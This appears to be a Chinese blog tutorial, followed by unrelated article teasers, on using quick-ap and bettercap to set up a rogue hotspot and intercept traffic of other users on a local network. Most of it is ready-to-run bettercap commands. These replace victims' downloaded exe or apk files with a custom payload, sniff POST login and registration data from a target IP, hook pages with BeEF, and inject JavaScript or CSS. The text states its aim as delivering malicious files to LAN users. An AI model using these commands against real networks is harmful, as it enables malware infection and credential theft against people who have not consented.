环境需求

  :kali系统 , .0版本

  :quick-ap

  :bettercap

  :bettercap-proxy-modules

  :......

  主要环境搭建

  目的:替换局域网用户的下载文件,变为我们自己定义的下载文件, 这个文件可以为一个恶意的exe或者apk

  quick-ap通过github即可下载:https://github.com/sqqihao/quick-ap

  需要bettercap的第三方模块:https://github.com/sqqihao/bettercap-proxy-modules

  在kali系统中插入usb网卡, 默认的网卡为wlan0, 如果网卡名字不一样的话,后面的脚本中所有的wlan0都要改, 不保证kali的新版本可用, 测试环境的kali版本为2.0 

  搭建热点 

  进入quick-ap的目录下, 执行文件,创建热点:

./apd.sh

  重新打开一个窗口, 进入bettercap-proxy-modules/http目录下,执行以下命令, 只要用户有下载exe文件或者其他类型的文件, 都会被替换,替换为我们自定义的exe文件, apk或者, rar文件也可以, 思路很多:

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/file.exe

    其他

  bettercap-proxy-modules还可以配合beef使用, 修改页面标题, 修改页面样式,嗅探登陆注册的请求信息

修改10. 为  你要攻击的IP
.1为网关的地址

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST : 嗅探信息

---HTTP

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module beefbox.rb --beef-path=/usr/share/beef-xss : 使用beef

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/payload.exe : 设置自定义下载文件

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -T 10.0.0.145 --proxy-module replace_images.rb --httpd-path /root/Desktop : 替换图片

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy-module hack_title.rb : 修改页面标题---JS

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file rainbow.js : 给页面添加一个彩虹

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file resizetext.js : 重新设置页面的字体大小

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file shakescreen.js : 页面图片抖动

--- CSS

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file blurpage.css :  页面模糊

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file flipimages.css : 颠倒图片

bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file spinimages.css : 图片旋转
bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file upsidedown.css : 页面颠倒

  bettercap还能实现页面插入css, 插入js, 插入html等功能, 这些东西可以参考bettercap的官网 https://www.bettercap.org/docs/proxying/http.html

InjectJS ( --proxy-module injectjs ) : Used to inject javascript code/files inside HTML pages.
InjectCSS ( --proxy-module injectcss ) : Used to inject CSS code/files inside HTML pages.
InjectHTML ( --proxy-module injecthtml ) : Used to inject HTML code inside HTML pages.

  相关:  

  youku视频:http://v.youku.com/v_show/id_XMjgwMjc2ODI0OA==.html?spm=a2h3j.8428770.3416059.1

  bettercap:https://www.bettercap.org/

  youtube视频:https://www.youtube.com/watch?v=y9OYrK4j4_4
  quick-ap通过github即可下载:https://github.com/sqqihao/quick-ap

  需要bettercap的第三方模块:https://github.com/sqqihao/bettercap-proxy-modules

QUICK-AP + BETTERCAP 替换局域网内其他用户的下载文件为自定义文件的更多相关文章

  1. Kali linux查看局域网内其他用户的输入信息

    使用nmap 工具在局域网里进行侦探,查看局域网里ip存活数量 root@kali:~# nmap -sP 192.168.1.0/24 Starting Nmap 7.60 ( https://nm ...

  2. 使用shutdown命令实现局域网内远程关机、重启整蛊他人

    用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\compu ...

  3. 不搭建git服务器对git仓库进行局域网内共享多人合作开发项目

    有时候在一个临时局域网内没有搭建git服务器,但是又想多人开发一个项目,此时只要每个人电脑安装有git客户端,参考一下方法即可尝试建一个本地化的远程仓库进行多人开发工作. 远程仓库通常只是一个裸仓库( ...

  4. 局域网内yum源搭建

    在一些环境下,服务器不能连接互联网,但是我们又偏偏需要安装一些软件,此时有点麻烦了.通过使用centos镜像文件,搭建yum本地源,局域网内所有服务器都可以连接这一本地源进行软件的下载和安装,下面具体 ...

  5. QUICK-AP + BETTERCAP 搭建热点, 欺骗局域网内用户下载任意可执行文件

    环境需求 1:kali系统 , 2.0版本 2:quick-ap 3:bettercap 4:bettercap-proxy-modules 5:博客园账号(把zip文件传到博客园的文件服务器) 主要 ...

  6. 关于局域网内IIS部署网站,本机可访问,而网内其他用户无法访问问题的解决方法

    在Window7操作系统中安装配置好IIS后,在本地IIS上部署网站程序没有问题,但是局域网等远程用户不能正常访问网站程序,提示“Internet Explorer 无法显示该网页”. 问题解决思路如 ...

  7. 中间人攻击-Arp之局域网内DNS欺骗

    基础知识 网关是啥? 网关是工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,网关就好比一个房间通向另一个房间的一扇门. ARP协议 假设A(192.168.1.2)与B(1 ...

  8. 局域网内使用linux的ntp服务

    假设我们的饿局域网无法连接外网,但又需要同步时间,怎么办? 1. 已局域网内的一台机器作为基础,适用date修改其他机器的时间,date -s ...,很不方便,这里不介绍. 2. 适用ntp服务,自 ...

  9. iOS下WebRTC音视频通话(二)-局域网内音视频通话

    这里是iOS 下WebRTC音视频通话开发的第二篇,在这一篇会利用一个局域网内音视频通话的例子介绍WebRTC中常用的API. 如果你下载并编译完成之后,会看到一个iOS 版的WebRTC Demo. ...

随机推荐

  1. 如何通过Mysql的二进制日志恢复数据库数据

    经常有网站管理员因为各种原因和操作,导致网站数据误删,而且又没有做网站备份,结果不知所措,甚至给网站运营和盈利带来负面影响.所以本文我们将和大家一起分享学习下如何通过Mysql的二机制日志(binlo ...

  2. angular的$http.post()提交数据到Java后台接收不到参数值问题的解决方法

    本文地址:http://www.cnblogs.com/jying/p/6733408.html   转载请注明出处: 写此文的背景:在工作学习使用angular的$http.post()提交数据时, ...

  3. iOS多线程的三种方法

    前言 在多线程简介中,我已经说明过了,为了提高界面的流畅度以及用户体验.我们务必要把耗时的操作放到别的线程中去执行,千万不要阻塞主线程.iOS中有以下3种多线程编程方法: NSThread Grand ...

  4. STM32F4XX与STM32F0XX编程差别

    //普通管脚初始化 /*****************************************************************************STM32F0***** ...

  5. React-Native 之 redux 与 react-redux

    前言 本文 有配套视频,可以酌情观看. 文中内容因各人理解不同,可能会有所偏差,欢迎朋友们联系我讨论. 文中所有内容仅供学习交流之用,不可用于商业用途,如因此引起的相关法律法规责任,与我无关,如文中内 ...

  6. qt中字符串转换

    11.各种数据类型的相互转换char * 与 const char *的转换char *ch1="hello11";const char *ch2="hello22&qu ...

  7. @JsonIgnoreProperties注解不起作用的问题解决

    最近做的一个东西要调第三方服务接口,要参照接口文档开发,但是第三方服务的接口字段名全部都是大写,本来以为这种应该没有什么问题.但是实际开发中发现大写的字段名字去调后台接口的时候报: org.codeh ...

  8. # Android动画笔记

    标签: Android开发艺术探索笔记 View动画 帧动画 属性动画 View动画 View动画的作用对象时View,有4种动画效果,分别是平移动画.缩放动画.旋转动画.和透明度动画. 此类动画通常 ...

  9. bzoj1834 [ZJOI2010]网络扩容

    Description 给定一张有向图,每条边都有一个容量C和一个扩容费用W.这里扩容费用是指将容量扩大1所需的费用.求: 1. 在不扩容的情况下,1到N的最大流: 2. 将1到N的最大流增加K所需的 ...

  10. 【算法系列学习】Dijkstra单源最短路 [kuangbin带你飞]专题四 最短路练习 A - Til the Cows Come Home

    https://vjudge.net/contest/66569#problem/A http://blog.csdn.net/wangjian8006/article/details/7871889 ...